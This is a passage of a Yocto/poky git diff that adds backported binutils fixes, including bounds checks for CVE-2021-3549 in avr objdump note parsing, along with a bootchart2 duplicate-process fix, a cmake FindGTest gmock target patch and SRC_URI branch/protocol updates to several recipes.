git/bfd/dwarf2.c +@@ -295,12 +295,12 @@ struct comp_unit + /* This data structure holds the information of an abbrev. */ + struct abbrev_info + { +- unsigned int number; /* Number identifying abbrev. */ +- enum dwarf_tag tag; /* DWARF tag. */ +- int has_children; /* Boolean. */ +- unsigned int num_attrs; /* Number of attributes. */ +- struct attr_abbrev *attrs; /* An array of attribute descriptions. */ +- struct abbrev_info *next; /* Next in chain. */ ++ unsigned int number; /* Number identifying abbrev. */ ++ enum dwarf_tag tag; /* DWARF tag. */ ++ bfd_boolean has_children; /* TRUE if the abbrev has children. */ ++ unsigned int num_attrs; /* Number of attributes. */ ++ struct attr_abbrev * attrs; /* An array of attribute descriptions. */ ++ struct abbrev_info * next; /* Next in chain. */ + }; + + struct attr_abbrev +@@ -1487,6 +1487,8 @@ struct varinfo + { + /* Pointer to previous variable in list of all variables */ + struct varinfo *prev_var; ++ /* The offset of the varinfo from the start of the unit. */ ++ bfd_uint64_t unit_offset; + /* Source location file name */ + char *file; + /* Source location line number */ +@@ -1497,7 +1499,7 @@ struct varinfo + /* Where the symbol is defined */ + asection *sec; + /* Is this a stack variable? */ +- unsigned int stack: 1; ++ bfd_boolean stack; + }; + + /* Return TRUE if NEW_LINE should sort after LINE. */ +@@ -2871,7 +2873,7 @@ lookup_symbol_in_variable_table (struct + struct varinfo* each; + + for (each = unit->variable_table; each; each = each->prev_var) +- if (each->stack == 0 ++ if (! each->stack + && each->file != NULL + && each->name != NULL + && each->addr == addr +@@ -3166,6 +3168,20 @@ read_rangelist (struct comp_unit *unit, + return TRUE; + } + ++static struct varinfo * ++lookup_var_by_offset (bfd_uint64_t offset, struct varinfo * table) ++{ ++ while (table) ++ { ++ if (table->unit_offset == offset) ++ return table; ++ table = table->prev_var; ++ } ++ ++ return NULL; ++} ++ ++ + /* DWARF2 Compilation unit functions. */ + + /* Scan over each die in a comp. unit looking for functions to add +@@ -3202,6 +3218,9 @@ scan_unit_for_symbols (struct comp_unit + bfd_vma low_pc = 0; + bfd_vma high_pc = 0; + bfd_boolean high_pc_relative = FALSE; ++ bfd_uint64_t current_offset; ++ ++ current_offset = info_ptr - unit->info_ptr_unit; + + /* PR 17512: file: 9f405d9d. */ + if (info_ptr >= info_ptr_end) +@@ -3234,12 +3253,13 @@ scan_unit_for_symbols (struct comp_unit + goto fail; + } + +- var = NULL; + if (abbrev->tag == DW_TAG_subprogram + || abbrev->tag == DW_TAG_entry_point + || abbrev->tag == DW_TAG_inlined_subroutine) + { + bfd_size_type amt = sizeof (struct funcinfo); ++ ++ var = NULL; + func = (struct funcinfo *) bfd_zalloc (abfd, amt); + if (func == NULL) + goto fail; +@@ -3268,13 +3288,15 @@ scan_unit_for_symbols (struct comp_unit + if (var == NULL) + goto fail; + var->tag = abbrev->tag; +- var->stack = 1; ++ var->stack = TRUE; + var->prev_var = unit->variable_table; + unit->variable_table = var; ++ var->unit_offset = current_offset; + /* PR 18205: Missing debug information can cause this + var to be attached to an already cached unit. */ + } +- ++ else ++ var = NULL; + /* No inline function in scope at this nesting level. */ + nested_funcs[nesting_level].func = 0; + } +@@ -3362,6 +3384,33 @@ scan_unit_for_symbols (struct comp_unit + { + switch (attr.name) + { ++ case DW_AT_specification: ++ if (attr.u.val) ++ { ++ struct varinfo * spec_var; ++ ++ spec_var = lookup_var_by_offset (attr.u.val, ++ unit->variable_table); ++ if (spec_var == NULL) ++ { ++ _bfd_error_handler (_("DWARF error: could not find " ++ "variable specification " ++ "at offset %lx"), ++ (unsigned long) attr.u.val); ++ break; ++ } ++ ++ if (var->name == NULL) ++ var->name = spec_var->name; ++ if (var->file == NULL && spec_var->file != NULL) ++ var->file = strdup (spec_var->file); ++ if (var->line == 0) ++ var->line = spec_var->line; ++ if (var->sec == NULL) ++ var->sec = spec_var->sec; ++ } ++ break; ++ + case DW_AT_name: + if (is_str_attr (attr.form)) + var->name = attr.u.str; +@@ -3378,7 +3427,7 @@ scan_unit_for_symbols (struct comp_unit + + case DW_AT_external: + if (attr.u.val != 0) +- var->stack = 0; ++ var->stack = FALSE; + break; + + case DW_AT_location: +@@ -3392,7 +3441,7 @@ scan_unit_for_symbols (struct comp_unit + if (attr.u.blk->data != NULL + && *attr.u.blk->data == DW_OP_addr) + { +- var->stack = 0; ++ var->stack = FALSE; + + /* Verify that DW_OP_addr is the only opcode in the + location, in which case the block size will be 1 +@@ -3888,7 +3937,7 @@ comp_unit_hash_info (struct dwarf2_debug + each_var = each_var->prev_var) + { + /* Skip stack vars and vars with no files or names. */ +- if (each_var->stack == 0 ++ if (! each_var->stack + && each_var->file != NULL + && each_var->name != NULL) + /* There is no need to copy name string into hash table as +Index: git/bfd/ChangeLog +=================================================================== +--- git.orig/bfd/ChangeLog ++++ git/bfd/ChangeLog +@@ -1,3 +1,9 @@ ++2020-04-16 Alan Modra <amodra@gmail.com> ++ ++ PR 25827 ++ * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't ++ strdup(0). ++ + 2020-02-19 H.J. Lu <hongjiu.lu@intel.com> + + PR binutils/25355 diff --git a/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch new file mode 100644 index 0000000000..4391db340a --- /dev/null +++ b/poky/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch @@ -0,0 +1,187 @@ +From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001 +From: Alan Modra <amodra@gmail.com> +Date: Thu, 11 Feb 2021 16:56:42 +1030 +Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes + +Adds missing sanity checks for avr device info note, to avoid +potential buffer overflows. Uses bfd_malloc_and_get_section for +sanity checking section size. + + PR 27290 + PR 27293 + PR 27295 + * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting. + Use bfd_malloc_and_get_section. + (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity + check namesz. Return NULL if descsz is too small. Ensure + string table is terminated. + (elf32_avr_get_device_info): Formatting. Add note_size param. + Sanity check note. + (elf32_avr_dump_mem_usage): Adjust to suit. + +Upstream-Status: Backport +CVE: CVE-2021-3549 +Signed-of-by: Armin Kuster <akuster@mvista.com> + +--- + binutils/ChangeLog | 14 +++++++++ + binutils/od-elf32_avr.c | 66 ++++++++++++++++++++++++++--------------- + 2 files changed, 56 insertions(+), 24 deletions(-) + +Index: git/binutils/od-elf32_avr.c +=================================================================== +--- git.orig/binutils/od-elf32_avr.c ++++ git/binutils/od-elf32_avr.c +@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd) + return bfd_get_flavour (abfd) == bfd_target_elf_flavour; + } + +-static char* ++static char * + elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size) + { + asection *section; ++ bfd_byte *contents; + +- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL) ++ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo"); ++ if (section == NULL) + return NULL; + +- *size = bfd_section_size (section); +- char *contents = (char *) xmalloc (*size); +- bfd_get_section_contents (abfd, section, contents, 0, *size); ++ if (!bfd_malloc_and_get_section (abfd, section, &contents)) ++ { ++ free (contents); ++ contents = NULL; ++ } + +- return contents; ++ *size = bfd_section_size (section); ++ return (char *) contents; + } + +-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents, +- bfd_size_type size) ++static char * ++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size, ++ bfd_size_type *descsz) + { + Elf_External_Note *xnp = (Elf_External_Note *) contents; + Elf_Internal_Note in; +@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bf + if (in.namesz > contents - in.namedata + size) + return NULL; + ++ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0) ++ return NULL; ++ + in.descsz = bfd_get_32 (abfd, xnp->descsz); + in.descdata = in.namedata + align_power (in.namesz, 2); +- if (in.descsz != 0 +- && (in.descdata >= contents + size +- || in.descsz > contents - in.descdata + size)) ++ if (in.descsz < 6 * sizeof (uint32_t) ++ || in.descdata >= contents + size ++ || in.descsz > contents - in.descdata + size) + return NULL; + +- if (strcmp (in.namedata, "AVR") != 0) +- return NULL; ++ /* If the note has a string table, ensure it is 0 terminated. */ ++ if (in.descsz > 8 * sizeof (uint32_t)) ++ in.descdata[in.descsz - 1] = 0; + ++ *descsz = in.descsz; + return in.descdata; + } + + static void + elf32_avr_get_device_info (bfd *abfd, char *description, +- deviceinfo *device) ++ bfd_size_type desc_size, deviceinfo *device) + { + if (description == NULL) + return; + + const bfd_size_type memory_sizes = 6; + +- memcpy (device, description, memory_sizes * sizeof(uint32_t)); +- device->name = NULL; ++ memcpy (device, description, memory_sizes * sizeof (uint32_t)); ++ desc_size -= memory_sizes * sizeof (uint32_t); ++ if (desc_size < 8) ++ return; + +- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes; ++ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes; + bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table); +- char *str_table = ((char *) stroffset_table) + stroffset_table_size; + + /* If the only content is the size itself, there's nothing in the table */ +- if (stroffset_table_size == 4) ++ if (stroffset_table_size < 8) + return; ++ if (desc_size <= stroffset_table_size) ++ return; ++ desc_size -= stroffset_table_size; + + /* First entry is the device name index. */ + uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1); ++ if (device_name_index >= desc_size) ++ return; + ++ char *str_table = (char *) stroffset_table + stroffset_table_size; + device->name = str_table + device_name_index; + } + +@@ -183,7 +201,7 @@ static void + elf32_avr_dump_mem_usage (bfd *abfd) + { + char *description = NULL; +- bfd_size_type note_section_size = 0; ++ bfd_size_type sec_size, desc_size; + + deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL }; + device.name = "Unknown"; +@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd) + bfd_size_type text_usage = 0; + bfd_size_type eeprom_usage = 0; + +- char *contents = elf32_avr_get_note_section_contents (abfd, +- ¬e_section_size); ++ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size); + + if (contents != NULL) + { +- description = elf32_avr_get_note_desc (abfd, contents, note_section_size); +- elf32_avr_get_device_info (abfd, description, &device); ++ description = elf32_avr_get_note_desc (abfd, contents, sec_size, ++ &desc_size); ++ elf32_avr_get_device_info (abfd, description, desc_size, &device); + } + + elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage, +Index: git/binutils/ChangeLog +=================================================================== +--- git.orig/binutils/ChangeLog ++++ git/binutils/ChangeLog +@@ -1,3 +1,17 @@ ++2021-02-11 Alan Modra <amodra@gmail.com> ++ ++ PR 27290 ++ PR 27293 ++ PR 27295 ++ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting. ++ Use bfd_malloc_and_get_section. ++ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity ++ check namesz. Return NULL if descsz is too small. Ensure ++ string table is terminated. ++ (elf32_avr_get_device_info): Formatting. Add note_size param. ++ Sanity check note. ++ (elf32_avr_dump_mem_usage): Adjust to suit. ++ + 2020-02-01 Nick Clifton <nickc@redhat.com> + + * configure: Regenerate. diff --git a/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch new file mode 100644 index 0000000000..3cb8a3c2a2 --- /dev/null +++ b/poky/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch @@ -0,0 +1,68 @@ +From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001 +From: Mingli Yu <mingli.yu@windriver.com> +Date: Fri, 5 Nov 2021 11:18:07 +0800 +Subject: [PATCH] bootchartd.in: make sure only one bootchartd process + +When boot with "init=/sbin/bootchartd" as below: + # runqemu qemux86 bootparams="init=/sbin/bootchartd" + +There are two bootchartd process after boot [1]. + # ps -ef | grep bootchart +root 101 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd +root 103 101 8 03:27 ? 00:00:02 /lib64/bootchart/bootchart-collector 50 +root 106 1 0 03:27 ? 00:00:00 /bin/sh /sbin/bootchartd +root 792 106 0 03:27 ? 00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000 +root 794 725 0 03:27 ttyS0 00:00:00 grep bootchart + + # /sbin/bootchartd stop +[bootchart] bootchart-collector started as pid 596 with 2 args: +[bootchart] '--dump' +[bootchart] '/tmp/bootchart.3lXpVDAq3v' +[bootchart] Extracting profile data from pid 204 +[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000' +[bootchart] read 135168 bytes of 135168 +[bootchart] reading 150 chunks (of 150) ... +[bootchart] wrote 18760 kbB +[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit + +But there still one process exist after the above stop command finish. + # ps -ef | grep bootchartd +root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd +root 629 516 0 09:10 ? 00:00:00 grep bootchartd + +Remove the wait_boot which used to wait the boot process to finish to +make sure only one bootchartd process and meanwhile we don't need the +wait_boot logic because we either use "/sbin/bootchartd stop" to stop +the bootchartd manually or install package bootchartd-stop-initscript +altogether with bootchart2 to stop bootchartd automatically after boot. + +After patch: + # ps -ef | grep bootchart + root 101 1 0 03:36 ? 00:00:00 /bin/sh /sbin/bootchartd + root 103 101 6 03:36 ? 00:00:04 /lib64/bootchart/bootchart-collector 50 + root 596 592 0 03:37 ttyS0 00:00:00 grep bootchart + +[1] https://github.com/xrmx/bootchart/issues/94 + +Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95] + +Signed-off-by: Mingli Yu <mingli.yu@windriver.com> +--- + bootchartd.in | 1 - + 1 file changed, 1 deletion(-) + +diff --git a/bootchartd.in b/bootchartd.in +index 7979ef9..f0e466d 100755 +--- a/bootchartd.in ++++ b/bootchartd.in +@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then + else # running inside the main system + echo "bootchart: no initrd used; starting" + start & +- wait_boot & + # wait a little, until the collector is going, before allowing + # the rest of the system to charge ahead, so we catch it + $USLEEP 250000 +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb b/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb index 6571c19938..66bd897a9a 100644 --- a/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb +++ b/poky/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb @@ -90,10 +90,11 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)" -SRC_URI = "git://github.com/xrmx/bootchart.git \ +SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \ file://bootchartd_stop.sh \ file://0001-collector-Allocate-space-on-heap-for-chunks.patch \ file://0001-bootchart2-support-usrmerge.patch \ + file://0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb b/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb index 4112cf484f..be61916cc6 100644 --- a/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb +++ b/poky/meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb @@ -15,7 +15,7 @@ DEPENDS_append_class-target = " udev" RDEPENDS_${PN} = "libgcc" SRCREV = "3fc2326d3474a5e4df2449f5e3043f7298501334" -SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git \ +SRC_URI = "git://git.kernel.org/pub/scm/linux/kernel/git/kdave/btrfs-progs.git;branch=master \ file://0001-Add-a-possibility-to-specify-where-python-modules-ar.patch \ " diff --git a/poky/meta/recipes-devtools/build-compare/build-compare_git.bb b/poky/meta/recipes-devtools/build-compare/build-compare_git.bb index b0560cc277..6afa9a0d68 100644 --- a/poky/meta/recipes-devtools/build-compare/build-compare_git.bb +++ b/poky/meta/recipes-devtools/build-compare/build-compare_git.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://github.com/openSUSE/build-compare" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" -SRC_URI = "git://github.com/openSUSE/build-compare.git \ +SRC_URI = "git://github.com/openSUSE/build-compare.git;branch=master;protocol=https \ file://Ignore-DWARF-sections.patch;striplevel=1 \ " diff --git a/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb b/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb index b2952ee5f5..96a7be6770 100644 --- a/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb +++ b/poky/meta/recipes-devtools/cmake/cmake-native_3.16.5.bb @@ -7,6 +7,7 @@ SRC_URI += "file://OEToolchainConfig.cmake \ file://environment.d-cmake.sh \ file://0001-CMakeDetermineSystem-use-oe-environment-vars-to-load.patch \ file://0005-Disable-use-of-ext2fs-ext2_fs.h-by-cmake-s-internal-.patch \ + file://0006-cmake-FindGTest-Add-target-for-gmock-library.patch \ " diff --git a/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch b/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch new file mode 100644 index 0000000000..267f586a71 --- /dev/null +++ b/poky/meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch @@ -0,0 +1,255 @@ +From 39eae0d6c1b398f18761abac7f55944f0290f8a1 Mon Sep 17 00:00:00 2001 +From: Eero Aaltonen <eero.aaltonen@iki.fi> +Date: Sun, 17 Oct 2021 17:13:07 +0300 +Subject: [PATCH] FindGTest: Add target for gmock library + +`googlemock` has been absorbed into the +[googletest](https://github.com/google/googletest) project and is built +and installed from the same source tree. + +As GTest may be built with or without GMock, skip GMock if it is not +present. + +Do not provide result variables for GMock. They are not provided by +upstream GTest's CMake Package Configuration File. + +Also update the test case to cover linking to `GTest::gmock`. + +The patch was imported from the Kitware git server +(git@gitlab.kitware.com:cmake/cmake.git) as of commit id +50bf457a0dd857cf976b22c5be7d333493233d1e + +Patch was modified to support upper case variable `GTEST_FOUND`. + +Upstream-Status: Accepted [https://gitlab.kitware.com/cmake/cmake/-/merge_requests/6632] +Milestone: 3.23.0 + +Signed-off-by: Eero Aaltonen <eero.aaltonen@vaisala.com> +--- + .../dev/FindGTest-target-for-gmock.rst | 4 + + Modules/FindGTest.cmake | 133 +++++++++++++++--- + Tests/FindGTest/Test/CMakeLists.txt | 4 + + 3 files changed, 121 insertions(+), 20 deletions(-) + create mode 100644 Help/release/dev/FindGTest-target-for-gmock.rst + +diff --git a/Help/release/dev/FindGTest-target-for-gmock.rst b/Help/release/dev/FindGTest-target-for-gmock.rst +new file mode 100644 +index 0000000000..f78242c80e +--- /dev/null ++++ b/Help/release/dev/FindGTest-target-for-gmock.rst +@@ -0,0 +1,4 @@ ++FindGTest-target-for-gmock ++-------------------------- ++ ++* The :module:`FindGTest` module now provides a target for GMock, if found. +diff --git a/Modules/FindGTest.cmake b/Modules/FindGTest.cmake +index e015a9840f..0331049594 100644 +--- a/Modules/FindGTest.cmake ++++ b/Modules/FindGTest.cmake +@@ -7,10 +7,23 @@ FindGTest + + Locate the Google C++ Testing Framework. + ++.. versionadded:: 3.20 ++ Upstream ``GTestConfig.cmake`` is used if possible. ++ + Imported targets + ^^^^^^^^^^^^^^^^ + +-This module defines the following :prop_tgt:`IMPORTED` targets: ++ This module defines the following :prop_tgt:`IMPORTED` targets: ++ ++``GTest::gtest`` ++ The Google Test ``gtest`` library, if found; adds Thread::Thread ++ automatically ++``GTest::gtest_main`` ++ The Google Test ``gtest_main`` library, if found ++ ++.. deprecated:: 3.20 ++ For backwards compatibility, this module defines additionally the ++ following deprecated :prop_tgt:`IMPORTED` targets (available since 3.5): + + ``GTest::GTest`` + The Google Test ``gtest`` library, if found; adds Thread::Thread +@@ -18,7 +31,6 @@ This module defines the following :prop_tgt:`IMPORTED` targets: + ``GTest::Main`` + The Google Test ``gtest_main`` library, if found + +- + Result variables + ^^^^^^^^^^^^^^^^ + +@@ -146,8 +158,42 @@ function(__gtest_import_library _target _var _config) + endif() + endfunction() + ++function(__gtest_define_backwards_compatible_library_targets) ++ set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES} PARENT_SCOPE) ++ ++ # Add targets mapping the same library names as defined in ++ # older versions of CMake's FindGTest ++ if(NOT TARGET GTest::GTest) ++ add_library(GTest::GTest INTERFACE IMPORTED) ++ target_link_libraries(GTest::GTest INTERFACE GTest::gtest) ++ endif() ++ if(NOT TARGET GTest::Main) ++ add_library(GTest::Main INTERFACE IMPORTED) ++ target_link_libraries(GTest::Main INTERFACE GTest::gtest_main) ++ endif() ++endfunction() ++ + # + ++include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) ++ ++# first specifically look for the CMake version of GTest ++find_package(GTest QUIET NO_MODULE) ++ ++# if we found the GTest cmake package then we are done, and ++# can print what we found and return. ++if(GTest_FOUND) ++ set(GTEST_FOUND ${GTest_FOUND}) ++ FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest HANDLE_COMPONENTS CONFIG_MODE) ++ ++ set(GTEST_LIBRARIES GTest::gtest) ++ set(GTEST_MAIN_LIBRARIES GTest::gtest_main) ++ ++ __gtest_define_backwards_compatible_library_targets() ++ ++ return() ++endif() ++ + if(NOT DEFINED GTEST_MSVC_SEARCH) + set(GTEST_MSVC_SEARCH MD) + endif() +@@ -194,50 +240,97 @@ if(MSVC AND GTEST_MSVC_SEARCH STREQUAL "MD") + __gtest_find_library(GTEST_LIBRARY_DEBUG gtest-mdd gtestd) + __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main-md gtest_main) + __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_main-mdd gtest_maind) ++ __gtest_find_library(GMOCK_LIBRARY gmock-md gmock) ++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmock-mdd gmockd) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main-md gmock_main) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_main-mdd gmock_maind) + else() + __gtest_find_library(GTEST_LIBRARY gtest) + __gtest_find_library(GTEST_LIBRARY_DEBUG gtestd) + __gtest_find_library(GTEST_MAIN_LIBRARY gtest_main) + __gtest_find_library(GTEST_MAIN_LIBRARY_DEBUG gtest_maind) ++ __gtest_find_library(GMOCK_LIBRARY gmock) ++ __gtest_find_library(GMOCK_LIBRARY_DEBUG gmockd) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY gmock_main) ++ __gtest_find_library(GMOCK_MAIN_LIBRARY_DEBUG gmock_maind) + endif() + +-include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) + FIND_PACKAGE_HANDLE_STANDARD_ARGS(GTest DEFAULT_MSG GTEST_LIBRARY GTEST_INCLUDE_DIR GTEST_MAIN_LIBRARY) + +-if(GTEST_FOUND) ++if(GMOCK_LIBRARY AND GMOCK_MAIN_LIBRARY) ++ set(GMock_FOUND True) ++else() ++ set(GMock_FOUND False) ++endif() ++ ++if(GTest_FOUND) + set(GTEST_INCLUDE_DIRS ${GTEST_INCLUDE_DIR}) + __gtest_append_debugs(GTEST_LIBRARIES GTEST_LIBRARY) + __gtest_append_debugs(GTEST_MAIN_LIBRARIES GTEST_MAIN_LIBRARY) +- set(GTEST_BOTH_LIBRARIES ${GTEST_LIBRARIES} ${GTEST_MAIN_LIBRARIES}) + + find_package(Threads QUIET) + +- if(NOT TARGET GTest::GTest) ++ if(NOT TARGET GTest::gtest) + __gtest_determine_library_type(GTEST_LIBRARY) +- add_library(GTest::GTest ${GTEST_LIBRARY_TYPE} IMPORTED) ++ add_library(GTest::gtest ${GTEST_LIBRARY_TYPE} IMPORTED) + if(TARGET Threads::Threads) +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_LINK_LIBRARIES Threads::Threads) + endif() + if(GTEST_LIBRARY_TYPE STREQUAL "SHARED") +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_COMPILE_DEFINITIONS "GTEST_LINKED_AS_SHARED_LIBRARY=1") + endif() + if(GTEST_INCLUDE_DIRS) +- set_target_properties(GTest::GTest PROPERTIES ++ set_target_properties(GTest::gtest PROPERTIES + INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}") + endif() +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "") +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "RELEASE") +- __gtest_import_library(GTest::GTest GTEST_LIBRARY "DEBUG") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gtest GTEST_LIBRARY "DEBUG") + endif() +- if(NOT TARGET GTest::Main) ++ if(NOT TARGET GTest::gtest_main) + __gtest_determine_library_type(GTEST_MAIN_LIBRARY) +- add_library(GTest::Main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED) +- set_target_properties(GTest::Main PROPERTIES +- INTERFACE_LINK_LIBRARIES "GTest::GTest") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "RELEASE") +- __gtest_import_library(GTest::Main GTEST_MAIN_LIBRARY "DEBUG") ++ add_library(GTest::gtest_main ${GTEST_MAIN_LIBRARY_TYPE} IMPORTED) ++ set_target_properties(GTest::gtest_main PROPERTIES ++ INTERFACE_LINK_LIBRARIES "GTest::gtest") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gtest_main GTEST_MAIN_LIBRARY "DEBUG") ++ endif() ++ ++ __gtest_define_backwards_compatible_library_targets() ++endif() ++ ++if(GMock_FOUND) ++ if(NOT TARGET GTest::gmock) ++ __gtest_determine_library_type(GMOCK_LIBRARY) ++ add_library(GTest::gmock ${GMOCK_LIBRARY_TYPE} IMPORTED) ++ set(_gmock_link_libraries "GTest::gtest") ++ if(TARGET Threads::Threads) ++ list(APPEND _gmock_link_libraries Threads::Threads) ++ endif() ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_LINK_LIBRARIES "${_gmock_link_libraries}") ++ if(GMOCK_LIBRARY_TYPE STREQUAL "SHARED") ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_COMPILE_DEFINITIONS "GMOCK_LINKED_AS_SHARED_LIBRARY=1") ++ endif() ++ if(GTEST_INCLUDE_DIRS) ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}") ++ endif() ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "") ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG") ++ endif() ++ if(NOT TARGET GTest::gmock_main) ++ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY) ++ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED) ++ set_target_properties(GTest::gmock_main PROPERTIES ++ INTERFACE_LINK_LIBRARIES "GTest::gmock") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG") + endif() + endif() +diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt +index b65b9d28f6..7d3a378a65 100644 +--- a/Tests/FindGTest/Test/CMakeLists.txt ++++ b/Tests/FindGTest/Test/CMakeLists.txt +@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx) + target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS}) + target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT}) + add_test(NAME test_gtest_var COMMAND test_gtest_var) ++ ++add_executable(test_gmock_tgt main.cxx) ++target_link_libraries(test_gmock_tgt GTest::gmock_main) ++add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt) +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb index c6a53ffece..3c403a4077 100644 --- a/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb +++ b/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/rpm-software-management/createrepo_c \ +SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \ 